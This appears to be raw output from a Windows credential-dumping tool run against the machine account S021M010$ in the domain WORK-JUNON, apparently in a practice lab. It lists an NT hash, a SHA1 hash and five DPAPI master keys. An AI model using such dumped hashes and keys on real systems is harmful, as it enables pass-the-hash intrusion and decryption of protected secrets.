authentication_id 39652 (9ae4)
session_id 0
username
domainname
logon_server
logon_time 2024-06-12T13:14:54.926187+00:00
sid None
luid 39652
== MSV ==
Username: S021M010$
Domain: WORK-JUNON
LM: NA
NT: f9087ef9674b02028a557c81a27f1424
SHA1: 1c95d197194f9ba60aa9aa8106b3c3b09fb88a5c
DPAPI: NA
== LogonSession ==
authentication_id 999 (3e7)
session_id 0
username S021M010$
domainname WORK-JUNON
logon_server
logon_time 2024-06-12T13:14:53.269945+00:00
sid S-1-5-18
luid 999
== WDIGEST [3e7]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username: s021m010$
Domain: WORK.JUNON.VL
== WDIGEST [3e7]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== DPAPI [3e7]==
luid 999
key_guid 50f6e676-21ba-4489-90de-e6e2cfe238af
masterkey bdbd05df32e6ce59ae3a3c3818927eb2044c5ff8fb8db7fb90fd8d2b77487dc571cc2751096c623909656d9b2068cacb849df2cc7ef040bec8eee5dd7685c577
sha1_masterkey 270ef4bec48cd5b64bfda8856763bb4e112b8931
== DPAPI [3e7]==
luid 999
key_guid 7c7155f8-0911-4e87-974d-1ba7871c2a7a
masterkey f05f426e2e4219aab9dc67c26843d03557a1172422c1ce238af7d5b423224dd212876bb0c0931fcd0ca116620d86fd6fcf8e21109d0f71af8970f3a10530e27a
sha1_masterkey 71338b7031796ec2abca1682913e1422fffc15e2
== DPAPI [3e7]==
luid 999
key_guid ff371070-e9d3-44b4-8633-fbd0e39db3a5
masterkey 5d8dc0bd5a77d6b3490abd3e25321e30ef9f8a699fdf9308a876da0ed19e853f8c68d0328456a2cf2b675b8495460735cecc3bf82d0c7c2cf837cac324afd87c
sha1_masterkey 8746b1b4a86f0c4909e8c824ed203fea18c60671
== DPAPI [3e7]==
luid 999
key_guid bd718cc2-88d9-46ca-8a89-5c32ce4fffae
masterkey 8a4fe8c3039a0fee979e992702febdecb4a9c51cf449be67ed78e104a1551c16b6998359b68004093867eea474595e8edb1b5e674dd0615c3c921fca1a2d00a7
sha1_masterkey 66164097d4e847b3b58b646a6f9f298033f7df31
== DPAPI [3e7]==
luid 999
key_guid 574a5bcc-e8cd-4737-9cf2-0c5e37feb7e8
masterkey b1a1b6a241aaea19769640daa2521ce464eba54809ba1842e155587e91758e179841a7c3508085cf22ea56c387bfb1b4e18c638110024c2ca1ce021ca9575f8e
sha1_masterkey 55d8feee756cba4c92a7dd977f8965d7e32e56c6